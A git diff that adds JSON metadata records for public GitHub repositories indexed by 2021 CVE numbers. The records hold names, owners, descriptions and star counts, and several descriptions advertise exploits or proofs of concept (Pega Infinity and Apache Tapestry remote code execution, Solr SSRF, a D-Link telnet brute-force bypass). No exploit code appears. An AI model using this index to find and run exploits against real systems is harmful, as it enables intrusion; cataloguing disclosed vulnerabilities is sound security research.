+ {
+ "id": 345007574,
+ "name": "cve-2021-27065",
+ "full_name": "adamrpostjr\/cve-2021-27065",
+ "owner": {
+ "login": "adamrpostjr",
+ "id": 32047648,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32047648?v=4",
+ "html_url": "https:\/\/github.com\/adamrpostjr"
+ },
+ "html_url": "https:\/\/github.com\/adamrpostjr\/cve-2021-27065",
+ "description": "Quick One Line Powershell scripts to detect for webshells, possible zips, and logs.",
+ "fork": false,
+ "created_at": "2021-03-06T04:47:35Z",
+ "updated_at": "2022-08-10T02:52:35Z",
+ "pushed_at": "2021-03-09T13:23:08Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27180.json b/2021/CVE-2021-27180.json
new file mode 100644
index 0000000000..d586d10376
--- /dev/null
+++ b/2021/CVE-2021-27180.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 356335946,
+ "name": "MDaemon-Advisories",
+ "full_name": "chudyPB\/MDaemon-Advisories",
+ "owner": {
+ "login": "chudyPB",
+ "id": 36897432,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36897432?v=4",
+ "html_url": "https:\/\/github.com\/chudyPB"
+ },
+ "html_url": "https:\/\/github.com\/chudyPB\/MDaemon-Advisories",
+ "description": "MDaemon Advisories - CVE-2021-27180, CVE-2021-27181, CVE-2021-27182, CVE-2021-27183",
+ "fork": false,
+ "created_at": "2021-04-09T16:34:28Z",
+ "updated_at": "2024-02-03T10:29:45Z",
+ "pushed_at": "2024-02-03T10:29:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27187.json b/2021/CVE-2021-27187.json
new file mode 100644
index 0000000000..1df332d791
--- /dev/null
+++ b/2021/CVE-2021-27187.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338061784,
+ "name": "CVE-2021-27187",
+ "full_name": "jet-pentest\/CVE-2021-27187",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-27187",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-11T15:03:48Z",
+ "updated_at": "2021-02-14T09:24:04Z",
+ "pushed_at": "2021-02-11T15:08:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27188.json b/2021/CVE-2021-27188.json
new file mode 100644
index 0000000000..b93828bea2
--- /dev/null
+++ b/2021/CVE-2021-27188.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338251533,
+ "name": "CVE-2021-27188",
+ "full_name": "jet-pentest\/CVE-2021-27188",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-27188",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-12T07:32:51Z",
+ "updated_at": "2021-02-14T09:24:02Z",
+ "pushed_at": "2021-02-12T07:36:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27190.json b/2021/CVE-2021-27190.json
new file mode 100644
index 0000000000..01664c11e6
--- /dev/null
+++ b/2021/CVE-2021-27190.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 337955124,
+ "name": "CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS",
+ "full_name": "anmolksachan\/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS",
+ "owner": {
+ "login": "anmolksachan",
+ "id": 60771253,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60771253?v=4",
+ "html_url": "https:\/\/github.com\/anmolksachan"
+ },
+ "html_url": "https:\/\/github.com\/anmolksachan\/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-11T07:10:58Z",
+ "updated_at": "2023-03-16T02:57:06Z",
+ "pushed_at": "2021-02-12T07:32:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27198.json b/2021/CVE-2021-27198.json
new file mode 100644
index 0000000000..5ce0d20289
--- /dev/null
+++ b/2021/CVE-2021-27198.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 709582719,
+ "name": "CVE-2021-27198",
+ "full_name": "rwincey\/CVE-2021-27198",
+ "owner": {
+ "login": "rwincey",
+ "id": 5438659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4",
+ "html_url": "https:\/\/github.com\/rwincey"
+ },
+ "html_url": "https:\/\/github.com\/rwincey\/CVE-2021-27198",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-25T01:22:07Z",
+ "updated_at": "2023-10-25T01:28:07Z",
+ "pushed_at": "2023-10-25T11:12:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27211.json b/2021/CVE-2021-27211.json
new file mode 100644
index 0000000000..76a0a36cae
--- /dev/null
+++ b/2021/CVE-2021-27211.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 339161320,
+ "name": "stegcrack",
+ "full_name": "b4shfire\/stegcrack",
+ "owner": {
+ "login": "b4shfire",
+ "id": 58707942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58707942?v=4",
+ "html_url": "https:\/\/github.com\/b4shfire"
+ },
+ "html_url": "https:\/\/github.com\/b4shfire\/stegcrack",
+ "description": "Exploit script for CVE-2021-27211",
+ "fork": false,
+ "created_at": "2021-02-15T17:54:49Z",
+ "updated_at": "2023-02-04T17:58:23Z",
+ "pushed_at": "2022-01-17T17:33:20Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27246.json b/2021/CVE-2021-27246.json
new file mode 100644
index 0000000000..b3c89207a7
--- /dev/null
+++ b/2021/CVE-2021-27246.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 343487613,
+ "name": "CVE-2021-27246_Pwn2Own2020",
+ "full_name": "synacktiv\/CVE-2021-27246_Pwn2Own2020",
+ "owner": {
+ "login": "synacktiv",
+ "id": 50145679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4",
+ "html_url": "https:\/\/github.com\/synacktiv"
+ },
+ "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-27246_Pwn2Own2020",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-01T16:45:42Z",
+ "updated_at": "2024-04-12T02:37:09Z",
+ "pushed_at": "2021-03-02T07:45:20Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27328.json b/2021/CVE-2021-27328.json
new file mode 100644
index 0000000000..4ed32b5560
--- /dev/null
+++ b/2021/CVE-2021-27328.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 340288345,
+ "name": "CVE-2021-27328",
+ "full_name": "SQSamir\/CVE-2021-27328",
+ "owner": {
+ "login": "SQSamir",
+ "id": 12712312,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12712312?v=4",
+ "html_url": "https:\/\/github.com\/SQSamir"
+ },
+ "html_url": "https:\/\/github.com\/SQSamir\/CVE-2021-27328",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-19T07:15:48Z",
+ "updated_at": "2021-02-19T08:16:14Z",
+ "pushed_at": "2021-02-19T08:16:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27338.json b/2021/CVE-2021-27338.json
new file mode 100644
index 0000000000..b11956fecd
--- /dev/null
+++ b/2021/CVE-2021-27338.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 372270842,
+ "name": "CVE-2021-27338",
+ "full_name": "Pho03niX\/CVE-2021-27338",
+ "owner": {
+ "login": "Pho03niX",
+ "id": 39918707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39918707?v=4",
+ "html_url": "https:\/\/github.com\/Pho03niX"
+ },
+ "html_url": "https:\/\/github.com\/Pho03niX\/CVE-2021-27338",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-30T17:02:56Z",
+ "updated_at": "2021-05-30T17:17:06Z",
+ "pushed_at": "2021-05-30T17:17:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27342.json b/2021/CVE-2021-27342.json
new file mode 100644
index 0000000000..2bdb9a2b0a
--- /dev/null
+++ b/2021/CVE-2021-27342.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 367514773,
+ "name": "D-Link-CVE-2021-27342-exploit",
+ "full_name": "mavlevin\/D-Link-CVE-2021-27342-exploit",
+ "owner": {
+ "login": "mavlevin",
+ "id": 33753158,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33753158?v=4",
+ "html_url": "https:\/\/github.com\/mavlevin"
+ },
+ "html_url": "https:\/\/github.com\/mavlevin\/D-Link-CVE-2021-27342-exploit",
+ "description": "Exploit for CVE-2021-27342 vulnerability (telnet authentication brute-force protection bypass)",
+ "fork": false,
+ "created_at": "2021-05-15T01:22:19Z",
+ "updated_at": "2024-06-21T09:31:49Z",
+ "pushed_at": "2021-05-15T01:26:07Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27403.json b/2021/CVE-2021-27403.json
new file mode 100644
index 0000000000..953155dc38
--- /dev/null
+++ b/2021/CVE-2021-27403.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 340105810,
+ "name": "CVE-2021-27403",
+ "full_name": "bokanrb\/CVE-2021-27403",
+ "owner": {
+ "login": "bokanrb",
+ "id": 25235094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25235094?v=4",
+ "html_url": "https:\/\/github.com\/bokanrb"
+ },
+ "html_url": "https:\/\/github.com\/bokanrb\/CVE-2021-27403",
+ "description": "XSS-Askey",
+ "fork": false,
+ "created_at": "2021-02-18T16:14:48Z",
+ "updated_at": "2023-06-27T01:07:11Z",
+ "pushed_at": "2021-02-18T17:09:47Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27404.json b/2021/CVE-2021-27404.json
new file mode 100644
index 0000000000..6f7d6efb73
--- /dev/null
+++ b/2021/CVE-2021-27404.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 340122850,
+ "name": "CVE-2021-27404",
+ "full_name": "bokanrb\/CVE-2021-27404",
+ "owner": {
+ "login": "bokanrb",
+ "id": 25235094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25235094?v=4",
+ "html_url": "https:\/\/github.com\/bokanrb"
+ },
+ "html_url": "https:\/\/github.com\/bokanrb\/CVE-2021-27404",
+ "description": "HostHeaderInjection-Askey",
+ "fork": false,
+ "created_at": "2021-02-18T17:16:39Z",
+ "updated_at": "2021-08-17T04:59:18Z",
+ "pushed_at": "2021-02-18T17:20:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27513.json b/2021/CVE-2021-27513.json
new file mode 100644
index 0000000000..d6dd582bb2
--- /dev/null
+++ b/2021/CVE-2021-27513.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 340848423,
+ "name": "CVE-2021-27513-CVE-2021-27514",
+ "full_name": "ArianeBlow\/CVE-2021-27513-CVE-2021-27514",
+ "owner": {
+ "login": "ArianeBlow",
+ "id": 61753065,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4",
+ "html_url": "https:\/\/github.com\/ArianeBlow"
+ },
+ "html_url": "https:\/\/github.com\/ArianeBlow\/CVE-2021-27513-CVE-2021-27514",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-21T08:00:14Z",
+ "updated_at": "2021-11-01T10:30:56Z",
+ "pushed_at": "2021-10-08T13:16:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414991608,
+ "name": "CVE-2021-27513",
+ "full_name": "ArianeBlow\/CVE-2021-27513",
+ "owner": {
+ "login": "ArianeBlow",
+ "id": 61753065,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4",
+ "html_url": "https:\/\/github.com\/ArianeBlow"
+ },
+ "html_url": "https:\/\/github.com\/ArianeBlow\/CVE-2021-27513",
+ "description": "ITSM_Broken_control",
+ "fork": false,
+ "created_at": "2021-10-08T13:11:00Z",
+ "updated_at": "2021-10-08T13:14:24Z",
+ "pushed_at": "2021-10-08T13:14:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27651.json b/2021/CVE-2021-27651.json
new file mode 100644
index 0000000000..bf96645904
--- /dev/null
+++ b/2021/CVE-2021-27651.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 367763176,
+ "name": "CVE-2021-27651-PoC",
+ "full_name": "samwcyo\/CVE-2021-27651-PoC",
+ "owner": {
+ "login": "samwcyo",
+ "id": 16300489,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16300489?v=4",
+ "html_url": "https:\/\/github.com\/samwcyo"
+ },
+ "html_url": "https:\/\/github.com\/samwcyo\/CVE-2021-27651-PoC",
+ "description": "RCE for Pega Infinity >= 8.2.1, Pega Infinity <= 8.5.2",
+ "fork": false,
+ "created_at": "2021-05-16T01:40:47Z",
+ "updated_at": "2024-05-31T11:57:52Z",
+ "pushed_at": "2021-05-16T05:54:07Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 367973600,
+ "name": "CVE-2021-27651",
+ "full_name": "Vulnmachines\/CVE-2021-27651",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-27651",
+ "description": "Pega Infinity Password Reset",
+ "fork": false,
+ "created_at": "2021-05-16T19:58:31Z",
+ "updated_at": "2023-09-28T11:27:43Z",
+ "pushed_at": "2021-12-06T19:04:04Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414009465,
+ "name": "CVE-2021-27651",
+ "full_name": "orangmuda\/CVE-2021-27651",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-27651",
+ "description": "bypass all stages of the password reset flow",
+ "fork": false,
+ "created_at": "2021-10-05T23:33:50Z",
+ "updated_at": "2023-09-28T11:32:04Z",
+ "pushed_at": "2021-10-05T23:35:24Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "code-injection",
+ "pega",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27850.json b/2021/CVE-2021-27850.json
new file mode 100644
index 0000000000..fe50c64ddd
--- /dev/null
+++ b/2021/CVE-2021-27850.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 380253996,
+ "name": "CVE-2021-27850_POC",
+ "full_name": "kahla-sec\/CVE-2021-27850_POC",
+ "owner": {
+ "login": "kahla-sec",
+ "id": 53152235,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53152235?v=4",
+ "html_url": "https:\/\/github.com\/kahla-sec"
+ },
+ "html_url": "https:\/\/github.com\/kahla-sec\/CVE-2021-27850_POC",
+ "description": "A Proof of concept for CVE-2021-27850 affecting Apache Tapestry and leading to unauthencticated remote code execution.",
+ "fork": false,
+ "created_at": "2021-06-25T13:55:41Z",
+ "updated_at": "2023-04-11T15:38:05Z",
+ "pushed_at": "2023-01-03T13:46:34Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 380518926,
+ "name": "CVE-2021-27850_POC",
+ "full_name": "dorkerdevil\/CVE-2021-27850_POC",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-27850_POC",
+ "description": "A Proof of concept for CVE-2021-27850 affecting Apache Tapestry and leading to unauthencticated remote code execution.",
+ "fork": false,
+ "created_at": "2021-06-26T14:16:00Z",
+ "updated_at": "2023-09-28T11:29:03Z",
+ "pushed_at": "2021-06-25T14:23:45Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382309693,
+ "name": "CVE_2021_27850_POC",
+ "full_name": "Ovi3\/CVE_2021_27850_POC",
+ "owner": {
+ "login": "Ovi3",
+ "id": 29408109,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29408109?v=4",
+ "html_url": "https:\/\/github.com\/Ovi3"
+ },
+ "html_url": "https:\/\/github.com\/Ovi3\/CVE_2021_27850_POC",
+ "description": "Apache Tapestry CVE-2021-27850 PoC",
+ "fork": false,
+ "created_at": "2021-07-02T10:21:58Z",
+ "updated_at": "2024-06-07T22:14:37Z",
+ "pushed_at": "2021-07-02T10:22:46Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 511347007,
+ "name": "CVE-2021-27850",
+ "full_name": "novysodope\/CVE-2021-27850",
+ "owner": {
+ "login": "novysodope",
+ "id": 45167857,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45167857?v=4",
+ "html_url": "https:\/\/github.com\/novysodope"
+ },
+ "html_url": "https:\/\/github.com\/novysodope\/CVE-2021-27850",
+ "description": "CVE-2021-27850 ysoserial",
+ "fork": false,
+ "created_at": "2022-07-07T01:42:44Z",
+ "updated_at": "2022-07-07T01:42:44Z",
+ "pushed_at": "2022-07-07T01:44:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27890.json b/2021/CVE-2021-27890.json
new file mode 100644
index 0000000000..dea8bdc774
--- /dev/null
+++ b/2021/CVE-2021-27890.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 351325727,
+ "name": "Mybb-XSS_SQL_RCE-POC",
+ "full_name": "xiaopan233\/Mybb-XSS_SQL_RCE-POC",
+ "owner": {
+ "login": "xiaopan233",
+ "id": 32785617,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32785617?v=4",
+ "html_url": "https:\/\/github.com\/xiaopan233"
+ },
+ "html_url": "https:\/\/github.com\/xiaopan233\/Mybb-XSS_SQL_RCE-POC",
+ "description": "Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc",
+ "fork": false,
+ "created_at": "2021-03-25T06:00:31Z",
+ "updated_at": "2023-09-15T05:41:19Z",
+ "pushed_at": "2021-03-25T06:56:52Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27905.json b/2021/CVE-2021-27905.json
new file mode 100644
index 0000000000..b6ee168dc9
--- /dev/null
+++ b/2021/CVE-2021-27905.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 360109059,
+ "name": "Solr-SSRF",
+ "full_name": "Henry4E36\/Solr-SSRF",
+ "owner": {
+ "login": "Henry4E36",
+ "id": 41940481,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4",
+ "html_url": "https:\/\/github.com\/Henry4E36"
+ },
+ "html_url": "https:\/\/github.com\/Henry4E36\/Solr-SSRF",
+ "description": "Apache Solr SSRF(CVE-2021-27905)",
+ "fork": false,
+ "created_at": "2021-04-21T09:27:21Z",
+ "updated_at": "2023-09-28T11:27:00Z",
+ "pushed_at": "2021-04-21T10:00:59Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 361414198,
+ "name": "Solr-SSRF",
+ "full_name": "W2Ning\/Solr-SSRF",
+ "owner": {
+ "login": "W2Ning",
+ "id": 33406415,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33406415?v=4",
+ "html_url": "https:\/\/github.com\/W2Ning"
+ },
+ "html_url": "https:\/\/github.com\/W2Ning\/Solr-SSRF",
+ "description": "CVE-2021-27905",
+ "fork": false,
+ "created_at": "2021-04-25T11:50:19Z",
+ "updated_at": "2021-04-28T16:37:34Z",
+ "pushed_at": "2021-04-28T16:37:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 394568825,
+ "name": "CVE-2021-27905",
+ "full_name": "murataydemir\/CVE-2021-27905",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-27905",
+ "description": "[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)",
+ "fork": false,
+ "created_at": "2021-08-10T07:49:47Z",
+ "updated_at": "2023-09-28T11:30:22Z",
+ "pushed_at": "2021-08-10T08:52:16Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 561105525,
+ "name": "CVE-2021-27905.POC",
+ "full_name": "pdelteil\/CVE-2021-27905.POC",
+ "owner": {
+ "login": "pdelteil",
+ "id": 20244863,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20244863?v=4",
+ "html_url": "https:\/\/github.com\/pdelteil"
+ },
+ "html_url": "https:\/\/github.com\/pdelteil\/CVE-2021-27905.POC",
+ "description": "POC for LFI related to CVE-2021-27905",
+ "fork": false,
+ "created_at": "2022-11-03T00:41:16Z",
+ "updated_at": "2022-12-29T05:08:43Z",
+ "pushed_at": "2022-11-17T06:27:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27928.json b/2021/CVE-2021-27928.json
new file mode 100644
index 0000000000..35d52d32fc
